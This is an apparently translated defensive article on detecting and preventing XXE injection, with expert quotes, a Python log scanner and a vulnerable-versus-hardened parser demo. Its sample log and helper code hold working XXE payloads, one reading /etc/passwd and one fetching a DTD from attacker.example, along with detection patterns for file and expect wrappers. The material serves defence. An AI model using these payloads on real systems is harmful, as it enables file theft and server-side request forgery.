XXE injections: Detection and prevention

Father

Today, XML is one of the most widely used formats for storing and transporting data. XXE (XML External Entity) injection abuses the way an application parses XML: if the parser resolves external entities declared in a DOCTYPE, attacker-supplied XML can make it read files from the application server's file system. Because the server performs the fetch, the attacker can also reach other applications and internal systems that are accessible only from the server.

An attacker who achieves such an injection can not only steal sensitive data but also use the vulnerable application for server-side request forgery (SSRF): the server can be made to issue HTTP requests to any URL it can reach, including internal services that are not exposed to the outside. This makes XXE a very dangerous vulnerability.

In this article, we explain how to detect and prevent XXE injections, and how XXE can be combined with local privilege escalation (LPE).

Methods for detecting XXE injections

One of the most important aspects of penetration testing is the detection of XML External Entity (XXE) vulnerabilities. An XXE vulnerability arises when an application parses XML that may declare external entities and resolves those entities insecurely. This is dangerous because it enables further attacks, from reading local files to, in some language runtimes and configurations, remote code execution.

Alexander Zubrikov
General Director ITGLOBAL.COM Security

To detect XXE vulnerabilities in web applications, you need to pay close attention to the endpoints that process user-supplied XML data. Crawlers or specialists inject specially crafted XML payloads, such as references to files, URLs, or external schemas, to check how the application processes such data.

To find vulnerabilities, you can use full-fledged vulnerability scanners such as OWASP ZAP, Burp Suite, Nessus, Acunetix, and others. You can also use highly specialized utilities such as XXExploiter.

To detect external XML entity attacks and vulnerabilities, you can use the following solutions:
  1. WAF (Web Application Firewall). Modern WAFs can be configured specifically to detect XXE attacks. A WAF filters incoming and outgoing traffic and flags anomalies that may indicate an attack attempt via XML external entities, such as a DOCTYPE with SYSTEM entity declarations in a request body.
  2. DAST (Dynamic Application Security Testing). These tools exercise the running application with crafted inputs and observe its behavior, allowing you to detect XXE and other vulnerabilities.
  3. Automated web crawlers. These programs can also be configured to detect XXE automatically by locating XML-consuming endpoints and submitting test payloads.
  4. Fuzzing. Various inputs (including manipulated XML documents) are fed to the application to identify vulnerabilities.
  5. SAST (static code analysis). These tools scan the source code for insecure parser configurations and other XXE-related weaknesses.
  6. IDS/IPS tools. Intrusion detection and prevention systems can be configured to detect attempts to exploit XXE vulnerabilities at the network level, for example outbound connections from the application server to unexpected hosts.

Konstantin Tyutyunnik
Head of the company IT For Prof

In one of our projects, we used a combination of WAF and monitoring systems to detect XXE. As soon as the WAF noticed a suspicious XML request, the monitoring system immediately sent a notification to the administrator, which allowed for quick action. Each of the methods for detecting external XML entities has its own pros and cons, and their effectiveness largely depends on the specific environment and use case. For this reason, I recommend combining various methods to best detect XXE vulnerabilities.

Monitoring is another way to detect XXE attempts. Properly configured logging and monitoring can quickly surface unusual requests or abnormal behavior, such as XML bodies that contain entity declarations or outbound connections initiated by the XML-parsing host, which can be a sign of an XXE attack.
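The WAF-plus-monitoring approach described above, as an added example that is not code from the original article: a small rule set is run over logged XML request bodies and each hit is scored, so that a monitoring pipeline can alert on the client and endpoint. The log format, the rule names and the sample log lines are constructed for this example; a production WAF would use a tuned rule set.

```python
"""Heuristic XXE detection over logged XML request bodies (constructed example)."""
import re
from typing import Dict, List

# Ordered (name, pattern) rules. A DOCTYPE alone is only MEDIUM: every XXE
# needs one, but some legitimate documents also carry a DOCTYPE.
RULES = [
    ("doctype", re.compile(r"<!DOCTYPE\b")),
    # <!ENTITY name SYSTEM "..."> or <!ENTITY % name SYSTEM "...">
    ("external-entity", re.compile(r"<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC)\b")),
    # parameter entities are the building block of blind / out-of-band XXE
    ("parameter-entity", re.compile(r"<!ENTITY\s+%\s*\w+")),
    # DTD or entity fetched over the network: OOB exfiltration or SSRF
    ("remote-system-id", re.compile(r'(?:SYSTEM|PUBLIC)\s+(?:"[^"]*"\s+)?["\'](?:https?|ftp)://', re.I)),
    # local file access and the URL wrappers abused for file reads / command execution
    ("local-file-uri", re.compile(r"\b(?:file|php|jar|netdoc|gopher|expect|dict)://", re.I)),
    ("sensitive-path", re.compile(r"/etc/(?:passwd|shadow)|[a-z]:[\\/]windows[\\/]", re.I)),
    # an entity whose replacement text references three or more other entities
    ("entity-expansion", re.compile(r'<!ENTITY\s+\w+\s+"(?:[^"&]*&\w+;){3,}')),
]


def inspect_body(body: str) -> List[str]:
    """Return the names of all rules that match the request body, in RULES order."""
    return [name for name, pattern in RULES if pattern.search(body)]


def severity(findings: List[str]) -> str:
    """A bare DOCTYPE is worth a look; anything beyond that is an attack indicator."""
    if not findings:
        return "none"
    if findings == ["doctype"]:
        return "medium"
    return "high"


def parse_line(line: str) -> Dict[str, str]:
    """Constructed log format: '<timestamp> <client> <method> <path> <body>'."""
    ts, client, method, path, body = line.split(" ", 4)
    return {"ts": ts, "client": client, "method": method, "path": path, "body": body}


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Run every rule over every logged body and return one alert per suspicious request."""
    alerts: List[Dict[str, object]] = []
    for line in lines:
        entry = parse_line(line)
        findings = inspect_body(entry["body"])
        level = severity(findings)
        if level != "none":
            alerts.append({"ts": entry["ts"], "client": entry["client"],
                           "path": entry["path"], "findings": findings,
                           "severity": level})
    return alerts


# Constructed sample log: one benign order, a file-read XXE, a blind/OOB XXE
# using a parameter entity, an entity-expansion bomb, and a harmless local DTD.
SAMPLE_LOG = [
    '2024-05-02T10:15:01Z 10.0.0.5 POST /api/orders <?xml version="1.0"?><order><id>42</id></order>',
    '2024-05-02T10:15:07Z 203.0.113.9 POST /api/orders <?xml version="1.0"?>'
    '<!DOCTYPE o [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><order><id>&xxe;</id></order>',
    '2024-05-02T10:15:12Z 203.0.113.9 POST /api/import <?xml version="1.0"?>'
    '<!DOCTYPE o [<!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd"> %dtd;]><order/>',
    '2024-05-02T10:15:20Z 198.51.100.4 POST /api/orders <?xml version="1.0"?><!DOCTYPE lolz ['
    '<!ENTITY lol "lol"><!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;">]><order><id>&lol1;</id></order>',
    '2024-05-02T10:15:33Z 10.0.0.8 POST /api/orders <?xml version="1.0"?>'
    '<!DOCTYPE order SYSTEM "order.dtd"><order><id>7</id></order>',
]


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["severity"].upper(), alert["client"], alert["path"], ", ".join(alert["findings"]))
```

Run as is, the scanner produces four alerts: two HIGH for the client 203.0.113.9 (file read and out-of-band parameter entity), one HIGH for the entity bomb, and one MEDIUM for the request that merely references a local DTD. The same rule set can be loaded into a WAF as a signature list, but keep the MEDIUM tier separate so that legitimate DOCTYPE-bearing documents do not drown out real attempts.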

Preventing XXE injections

Eliminating XXE vulnerabilities from the code and infrastructure is one of the most important tasks for securing an organization's IT infrastructure. The simplest and most effective measure is to disable external entities, that is, to turn off the processing of external XML entities (and, where possible, DTDs altogether) in the XML parser's configuration.

Sergey Polunin
Head of the Infrastructure IT Protection Group at Gazinformservis

Typically, preventing an XXE injection attack consists of eliminating its causes – errors in the application's code or logic. However, in addition to this, it is useful to use application-level firewalls, which can use signatures or AI to detect and block such attacks, even if errors in the code allow them to be carried out.

Methods for preventing XXE injections:
  1. Validation of input data. Validate XML against the expected schema and reject documents that contain a DOCTYPE when none is needed.
  2. Whitelist. If you need to support XML processing with entities, create a "white list" of valid entities and restrict the parser to it.
  3. Timely updates and patches. Keep an eye on updates to your XML parser and other system components that may be vulnerable to XXE attacks.
  4. Restriction of access rights. Run the process that parses XML with the least privilege it needs, so that even a successful XXE can read only the files the application legitimately requires.
  5. Disable DTDs and external schemas if the application does not require them.
  6. WAF (Web Application Firewall). The tool must be configured to filter incoming requests and block XXE payloads.

Experts also recommend avoiding unnecessary XML parsing features: disable the functions that process external entities whenever the application does not need them.
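The parser setting that the prevention list refers to, shown as an added example with the Python standard library (this is not code from the original article). xml.sax sits on expat, and its feature_external_ges flag decides whether external general entities are resolved: with the flag on, a constructed XXE payload pulls a local file into the parsed document; with it off (the Python default since 3.7.1) the entity resolves to nothing. The hardened parser additionally refuses any DOCTYPE, because disabling external entities alone does not stop internal entity expansion. The secret file, the payloads and the element names are constructed for this example.

```python
"""Vulnerable versus hardened XML parsing with xml.sax / expat (constructed example)."""
import io
import os
import tempfile
from pathlib import Path
from typing import List

import xml.sax
from xml.sax import handler


class XMLRejected(ValueError):
    """Raised by the hardened parser when a document declares a DTD."""


class IdCollector(handler.ContentHandler):
    """Collects the character data of every <id> element."""

    def __init__(self) -> None:
        super().__init__()
        self.ids: List[str] = []
        self._buf = None

    def startElement(self, name, attrs):
        if name == "id":
            self._buf = []

    def characters(self, content):
        if self._buf is not None:
            self._buf.append(content)

    def endElement(self, name):
        if name == "id":
            self.ids.append("".join(self._buf))
            self._buf = None


def xxe_payload(target: str) -> bytes:
    """Classic XXE: an external general entity pointing at a local file."""
    uri = Path(target).resolve().as_uri()
    return (
        '<?xml version="1.0"?>'
        f'<!DOCTYPE order [<!ENTITY xxe SYSTEM "{uri}">]>'
        "<order><id>&xxe;</id></order>"
    ).encode()


# Internal-entity expansion bomb: it declares no external entity, so
# feature_external_ges does nothing against it; only refusing the DTD does.
ENTITY_BOMB = (
    '<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol">'
    '<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">]>'
    "<order><id>&lol1;</id></order>"
).encode()


def parse_ids(xml_bytes: bytes, resolve_external_entities: bool) -> List[str]:
    """Parse with expat; the flag is the vulnerable-versus-safe switch."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    collector = IdCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return collector.ids


def parse_ids_hardened(xml_bytes: bytes) -> List[str]:
    """Reject any DTD up front, then parse with external entities disabled.

    The byte check assumes UTF-8/ASCII input (true for this example); for other
    encodings decode first so an attacker cannot hide the DOCTYPE in UTF-16.
    """
    if b"<!DOCTYPE" in xml_bytes:
        raise XMLRejected("DTD not allowed")
    return parse_ids(xml_bytes, resolve_external_entities=False)


def demo() -> dict:
    """Write a constructed secret, then parse the XXE payload three ways."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "config.ini")
        with open(secret, "w", encoding="utf-8") as f:
            f.write("db_password=s3cr3t-db-password")  # constructed secret
        payload = xxe_payload(secret)
        leaked = parse_ids(payload, resolve_external_entities=True)   # vulnerable
        blocked = parse_ids(payload, resolve_external_entities=False)  # external entities off
        rejected = []
        for doc in (payload, ENTITY_BOMB):
            try:
                parse_ids_hardened(doc)
                rejected.append(False)
            except XMLRejected:
                rejected.append(True)
    return {"leaked": leaked, "blocked": blocked, "rejected": rejected}


if __name__ == "__main__":
    print(demo())
```

Running demo() shows the file contents inside the <id> element in the vulnerable configuration, an empty <id> once external general entities are off, and both the file-read payload and the entity bomb rejected by the hardened parser. The same two controls exist in other parsers under different names (for example the external-general-entities and disallow-doctype-decl features of Java's DocumentBuilderFactory); when a project can take a dependency, the defusedxml package wraps the standard-library parsers with these protections already applied.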

Konstantin Tyutyunnik
Head of the company IT For Prof

The use of several XXE prevention methods, together with regular monitoring, security policies, regulations, and employee awareness-raising, significantly increases the level of protection against XXE vulnerabilities. Do not run the app under a privileged root user and always store 2-3 backups on different storage locations. Use a version control system like Git. Remember, security is not a one-time event, it's a process.

In addition, to prevent XXE injections, do not forget about monitoring and auditing systems that will help you quickly detect and respond to suspicious actions. Backups of important data and systems are also important so that in the event of an attack, you can restore your work.

And of course, do not forget the human factor: improving the information security skills of developers and administrators, and training other employees of the company in cyber hygiene.

Local Privilege Escalation

LPE (Local Privilege Escalation) is usually not achieved directly with XXE. Local Privilege Escalation and XML External Entity injection are two different threats, but they can overlap in the same attack chain. Some language runtimes, such as PHP with the expect:// stream wrapper enabled, may allow command execution through XXE. In most others, such as Java, XXE on its own only allows reading files (and making server-side requests).

Evgeny Gryaznov
Product Manager, R-Vison Threat Deception Platform (R-Vision TDP)

For local privilege escalation, you need, for example, to find usernames/passwords or other data on the file system that allows you to increase these privileges. The most common mistake is storing credentials, for example, for a DBMS, in clear text in the application configuration, which allows you to get this data via XXE and then connect directly to the DBMS. Or find the keys for the SSH connection and use them.

Privilege escalation can occur only after minimal access to the system has been obtained; the attacker then tries to obtain administrator-level access. Most often, the attack vectors are configuration errors, missing security updates, and the presence of vulnerable software. There are special tools that let an attacker enumerate such weaknesses in the system.

Alexander Zubrikov
General Director ITGLOBAL.COM Security

The implementation of LPE during XXE exploitation may vary depending on the context and specific configuration of the target system. However, there are several common ways to reach LPE: an attacker can gain the ability to read local files that can contain administrator or other user credentials. If XXE is exploited on a server, its faulty XML processing may cause a buffer overflow or exploit other vulnerabilities in system calls. This can enable a Remote Code Execution (RCE) attack and result in privileged code execution.

To protect against such privilege escalation methods, experts recommend keeping the software and operating system updated and minimizing the use of accounts with administrative privileges. In addition, configure access rights and security policies, use application whitelisting such as Software Restriction Policies (SRP) or AppLocker on Windows, and conduct regular security audits.

Conclusions

When it comes to preventing XXE injections, standard security measures play an important role, provided they are applied and kept up to date; in practice they are often neglected or put in order too late. Timely software and security updates go a long way toward protecting the company's IT infrastructure.

It is equally important to restrict the rights of administrators and disable processing of external XML entities. Therefore, configuring XML parsers to disable support for external entities is one of the key points of protection.

To protect against LPE vulnerabilities, it is important to minimize the rights of each user and service, as well as regularly update the software and OS. Although XXE and LPE have different attack vectors, proper setup and configuration can significantly reduce risks in both categories.